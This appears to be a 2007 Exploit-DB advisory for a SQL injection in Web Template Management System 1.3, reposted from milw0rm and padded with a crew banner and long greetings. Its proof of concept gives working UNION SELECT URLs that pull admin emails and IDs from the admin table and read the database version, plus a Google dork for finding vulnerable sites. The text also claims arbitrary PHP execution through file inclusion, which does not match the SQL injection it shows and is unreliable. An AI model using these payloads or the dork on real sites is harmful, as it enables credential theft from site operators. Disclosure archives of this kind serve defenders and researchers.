Web Template Management System 1.3 - SQL Injection

EDB-ID:

4482


Author:

bius

Type:

webapps


Platform:

PHP

Date:

2007-10-04


#############################Nyubicrew Community################################
#
#  deonixscripts (id) Remote Sql Injection
#
#  vendor : http://www.deonixscripts.com/
#  Demo : http://www.deonixscripts.com/demo/tplmgt13/
#
#################################################################################
#
#
#       Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)
#
#       contact: bius22@mac.com
#
#       Website : www.solpotcrew.org/adv/home_edition2001-adv-03.txt
#
################################################################################
#
#
#      Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM , 
#              nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul
#              wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz
#              th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem
#              x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]
#              and all member #nyubicrew @ irc.mildnet.org
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "id" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by Remote Sql Injection

P.O.C :

http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin/*
http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,@@version,3/*

Google Dork : Powered by: deonixscripts.com

######################MY Special Girl JUST FOR U Ula#########################
######################################E.O.F##################################

# milw0rm.com [2007-10-04]